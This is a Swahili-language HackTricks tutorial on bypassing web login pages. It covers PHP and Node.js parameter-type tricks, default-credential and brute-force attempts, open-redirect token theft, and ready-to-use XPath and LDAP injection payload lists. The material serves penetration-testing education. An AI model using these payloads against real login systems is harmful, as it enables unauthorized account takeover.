Login Bypass

Reading time: 4 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Kupita kuingia kwa kawaida

Ikiwa unapata ukurasa wa kuingia, hapa unaweza kupata mbinu za kujaribu kupita:

  • Angalia maoni ndani ya ukurasa (piga chini na kulia?)
  • Angalia ikiwa unaweza kufikia moja kwa moja kurasa zilizozuiliwa
  • Angalia usitume vigezo (usitume yoyote au moja tu)
  • Angalia makosa ya kulinganisha ya PHP: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Badilisha aina ya maudhui kuwa json na tuma thamani za json (bool true ikiwa imejumuishwa)
  • Ikiwa unapata jibu linalosema kwamba POST hait supported unaweza kujaribu kutuma JSON katika mwili lakini kwa ombi la GET na Content-Type: application/json
  • Angalia makosa ya uwezekano wa parsing ya nodejs (soma hii): password[password]=1
  • Nodejs itabadilisha payload hiyo kuwa query inayofanana na ifuatayo: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; ambayo inafanya sehemu ya password kuwa daima kweli.
  • Ikiwa unaweza kutuma kitu cha JSON unaweza kutuma "password":{"password": 1} ili kupita kuingia.
  • Kumbuka kwamba ili kupita kuingia hii bado unahitaji kujua na kutuma jina la mtumiaji halali.
  • Kuongeza "stringifyObjects":true chaguo unapoitisha mysql.createConnection hatimaye itablokuza tabia zisizotarajiwa wakati Object inapopita katika parameter.
  • Angalia akidi:
  • Akidi za kawaida za teknolojia/jukwaa lililotumika
  • Mchanganyiko wa kawaida (root, admin, password, jina la teknolojia, mtumiaji wa kawaida na moja ya hizi passwords).
  • Unda kamusi ukitumia Cewl, ongeza jina la mtumiaji na password za kawaida (ikiwa zipo) na jaribu kujaribu nguvu kutumia maneno yote kama majina ya watumiaji na password
  • Jaribu nguvu ukitumia kamusi kubwa (Jaribu nguvu)

SQL Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kupita kuingia kupitia SQL injections.

Katika ukurasa ufuatao unaweza kupata orodha maalum ya kujaribu kupita kuingia kupitia SQL Injections:

Login bypass List

No SQL Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kupita kuingia kupitia No SQL Injections.

Kwa kuwa NoSQL Injections inahitaji kubadilisha thamani za vigezo, utahitaji kujaribu kwa mikono.

XPath Injection authentication bypass

Hapa unaweza kupata mbinu kadhaa za kupita kuingia kupitia XPath Injection.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection authentication bypass

Hapa unaweza kupata hila kadhaa za kupita kwenye kuingia kupitia LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Kumbuka Mimi

Ikiwa ukurasa una kazi ya "Kumbuka Mimi" angalia jinsi ilivyoanzishwa na uone kama unaweza kuitumia vibaya ili kuchukua akaunti nyingine.

Mwelekeo

Kurasa kwa kawaida huwasilisha watumiaji baada ya kuingia, angalia kama unaweza kubadilisha mwelekeo huo ili kusababisha Mwelekeo Wazi. Labda unaweza kuiba taarifa fulani (misimbo, vidakuzi...) ikiwa utaelekeza mtumiaji kwenye wavuti yako.

Ukaguzi Mwingine

  • Angalia kama unaweza kuhesabu majina ya watumiaji kwa kutumia vibaya kazi ya kuingia.
  • Angalia kama kujaza kiotomatiki kuna kazi katika nywila/taarifa nyeti fomu ingizo: <input autocomplete="false">

Zana za Kiotomatiki

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks